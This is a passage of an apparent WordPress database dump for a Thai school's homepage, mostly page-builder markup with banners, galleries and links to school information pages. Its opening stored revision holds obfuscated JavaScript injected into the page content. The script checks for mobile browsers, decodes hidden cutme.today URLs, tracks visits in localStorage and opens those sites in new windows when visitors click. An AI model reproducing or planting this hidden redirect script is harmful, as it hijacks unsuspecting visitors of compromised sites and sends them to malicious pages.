g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-09-11 14:41:56','2025-09-11 07:41:56','',14,'http://pakhaeng.ssk.in.th/?p=2042',0,'revision','',0),
(2044,1,'2025-09-11 14:44:08','2025-09-11 07:44:08','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"9f7ee323\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1e35ff-0d\",\"ids\":[2026,2039],\"type\":\"fluidcarousel\",\"imageRatio\":\"inherit\",\"autoPlay\":true,\"transSpeed\":1240,\"imagesDynamic\":[{\"id\":2026,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2026\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1024x410.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"width\":1024,\"height\":410},{\"id\":2039,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2039\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-1024x512.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"width\":750,\"height\":375}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 